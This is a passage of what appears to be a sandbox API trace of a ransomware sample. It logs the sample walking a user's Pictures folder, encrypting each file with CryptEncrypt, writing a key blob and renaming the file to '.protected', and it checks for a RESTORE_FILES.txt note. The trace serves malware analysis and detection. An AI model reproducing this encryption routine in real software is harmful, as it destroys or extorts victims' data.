lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0092.391] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0092.391] CloseHandle (hObject=0xa4) returned 1 [0092.391] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.protected") returned 54 [0092.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.protected")) returned 1 [0092.392] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.392] lstrcmpiW (lpString1="Pictures", lpString2="Windows") returned -1 [0092.392] lstrcmpiW (lpString1="Pictures", lpString2="Program Files") returned -1 [0092.392] lstrcmpiW (lpString1="Pictures", lpString2="Program Files (x86)") returned -1 [0092.392] lstrcmpiW (lpString1="Pictures", lpString2="$Recycle.bin") returned 1 [0092.392] lstrcmpiW (lpString1="Pictures", lpString2="System Volume Information") returned -1 [0092.392] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 42 [0092.392] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0092.392] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0092.392] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned 44 [0092.392] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0092.393] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.393] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.393] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.393] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.393] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.393] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\.") returned 44 [0092.393] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.393] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0092.393] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0092.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.393] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.393] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.393] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.393] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.393] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.393] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.393] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\..") returned 45 [0092.393] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.393] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.393] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0092.393] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0092.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.393] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.393] lstrcmpiW (lpString1="cBERVLmH6 BLFZXq2b.gif", lpString2="Windows") returned -1 [0092.393] lstrcmpiW (lpString1="cBERVLmH6 BLFZXq2b.gif", lpString2="Program Files") returned -1 [0092.393] lstrcmpiW (lpString1="cBERVLmH6 BLFZXq2b.gif", lpString2="Program Files (x86)") returned -1 [0092.393] lstrcmpiW (lpString1="cBERVLmH6 BLFZXq2b.gif", lpString2="$Recycle.bin") returned 1 [0092.393] lstrcmpiW (lpString1="cBERVLmH6 BLFZXq2b.gif", lpString2="System Volume Information") returned -1 [0092.393] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif") returned 65 [0092.393] StrStrIW (lpFirst="cBERVLmH6 BLFZXq2b.gif", lpSrch=".protected") returned 0x0 [0092.393] lstrcmpW (lpString1="cBERVLmH6 BLFZXq2b.gif", lpString2="RESTORE_FILES.txt") returned -1 [0092.394] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.394] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cbervlmh6 blfzxq2b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif") returned 65 [0092.394] StrStrW (lpFirst="cBERVLmH6 BLFZXq2b.gif", lpSrch=".txt") returned 0x0 [0092.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif") returned 65 [0092.394] StrStrW (lpFirst="cBERVLmH6 BLFZXq2b.gif", lpSrch=".rar") returned 0x0 [0092.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif") returned 65 [0092.394] StrStrW (lpFirst="cBERVLmH6 BLFZXq2b.gif", lpSrch=".zip") returned 0x0 [0092.394] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.395] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.395] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.395] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.395] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.395] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.395] CloseHandle (hObject=0xb4) returned 1 [0092.396] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif.protected") returned 75 [0092.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cbervlmh6 blfzxq2b.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cBERVLmH6 BLFZXq2b.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cbervlmh6 blfzxq2b.gif.protected")) returned 1 [0092.396] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.396] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0092.396] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0092.396] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0092.396] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0092.396] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0092.396] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0092.396] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0092.396] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0092.396] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.397] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0092.397] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0092.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0092.397] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0092.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0092.397] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0092.397] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0092.397] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.397] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0092.398] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.398] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.398] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.398] CloseHandle (hObject=0xb4) returned 1 [0092.398] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.protected") returned 64 [0092.398] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini.protected")) returned 1 [0092.398] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.398] lstrcmpiW (lpString1="e8PF.gif", lpString2="Windows") returned -1 [0092.398] lstrcmpiW (lpString1="e8PF.gif", lpString2="Program Files") returned -1 [0092.399] lstrcmpiW (lpString1="e8PF.gif", lpString2="Program Files (x86)") returned -1 [0092.399] lstrcmpiW (lpString1="e8PF.gif", lpString2="$Recycle.bin") returned 1 [0092.399] lstrcmpiW (lpString1="e8PF.gif", lpString2="System Volume Information") returned -1 [0092.399] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif") returned 51 [0092.399] StrStrIW (lpFirst="e8PF.gif", lpSrch=".protected") returned 0x0 [0092.399] lstrcmpW (lpString1="e8PF.gif", lpString2="RESTORE_FILES.txt") returned -1 [0092.399] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.399] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e8pf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif") returned 51 [0092.399] StrStrW (lpFirst="e8PF.gif", lpSrch=".txt") returned 0x0 [0092.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif") returned 51 [0092.399] StrStrW (lpFirst="e8PF.gif", lpSrch=".rar") returned 0x0 [0092.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif") returned 51 [0092.399] StrStrW (lpFirst="e8PF.gif", lpSrch=".zip") returned 0x0 [0092.399] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.400] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.400] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.400] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.400] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.400] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.400] CloseHandle (hObject=0xb4) returned 1 [0092.400] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif.protected") returned 61 [0092.400] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e8pf.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\e8PF.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e8pf.gif.protected")) returned 1 [0092.401] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.401] lstrcmpiW (lpString1="eYNE3D.jpg", lpString2="Windows") returned -1 [0092.401] lstrcmpiW (lpString1="eYNE3D.jpg", lpString2="Program Files") returned -1 [0092.401] lstrcmpiW (lpString1="eYNE3D.jpg", lpString2="Program Files (x86)") returned -1 [0092.401] lstrcmpiW (lpString1="eYNE3D.jpg", lpString2="$Recycle.bin") returned 1 [0092.401] lstrcmpiW (lpString1="eYNE3D.jpg", lpString2="System Volume Information") returned -1 [0092.401] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg") returned 53 [0092.401] StrStrIW (lpFirst="eYNE3D.jpg", lpSrch=".protected") returned 0x0 [0092.401] lstrcmpW (lpString1="eYNE3D.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0092.401] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.401] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\eyne3d.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.402] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg") returned 53 [0092.402] StrStrW (lpFirst="eYNE3D.jpg", lpSrch=".txt") returned 0x0 [0092.402] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg") returned 53 [0092.402] StrStrW (lpFirst="eYNE3D.jpg", lpSrch=".rar") returned 0x0 [0092.402] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg") returned 53 [0092.402] StrStrW (lpFirst="eYNE3D.jpg", lpSrch=".zip") returned 0x0 [0092.402] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.403] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.403] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.403] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.403] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.403] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.403] CloseHandle (hObject=0xb4) returned 1 [0092.403] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg.protected") returned 63 [0092.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\eyne3d.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eYNE3D.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\eyne3d.jpg.protected")) returned 1 [0092.404] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.404] lstrcmpiW (lpString1="GgHVBzlKK6crvWZop5E", lpString2="Windows") returned -1 [0092.404] lstrcmpiW (lpString1="GgHVBzlKK6crvWZop5E", lpString2="Program Files") returned -1 [0092.404] lstrcmpiW (lpString1="GgHVBzlKK6crvWZop5E", lpString2="Program Files (x86)") returned -1 [0092.404] lstrcmpiW (lpString1="GgHVBzlKK6crvWZop5E", lpString2="$Recycle.bin") returned 1 [0092.404] lstrcmpiW (lpString1="GgHVBzlKK6crvWZop5E", lpString2="System Volume Information") returned -1 [0092.404] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E") returned 62 [0092.404] lstrcmpW (lpString1="GgHVBzlKK6crvWZop5E", lpString2=".") returned 1 [0092.404] lstrcmpW (lpString1="GgHVBzlKK6crvWZop5E", lpString2="..") returned 1 [0092.404] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\*") returned 64 [0092.404] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.404] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.404] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.404] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.404] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.404] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.404] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\.") returned 64 [0092.404] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.404] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.404] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.404] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.404] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.404] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.404] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.405] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\..") returned 65 [0092.405] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.405] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.405] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.405] lstrcmpiW (lpString1="GNxOOw1.bmp", lpString2="Windows") returned -1 [0092.405] lstrcmpiW (lpString1="GNxOOw1.bmp", lpString2="Program Files") returned -1 [0092.405] lstrcmpiW (lpString1="GNxOOw1.bmp", lpString2="Program Files (x86)") returned -1 [0092.405] lstrcmpiW (lpString1="GNxOOw1.bmp", lpString2="$Recycle.bin") returned 1 [0092.405] lstrcmpiW (lpString1="GNxOOw1.bmp", lpString2="System Volume Information") returned -1 [0092.405] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GgHVBzlKK6crvWZop5E\\GNxOOw1.bmp") returned 74 [0092.405] StrStrIW (lpFirst="GNxOOw1.bmp", lpSrch=".protected") returned 0x0 [0092.405] lstrcmpW 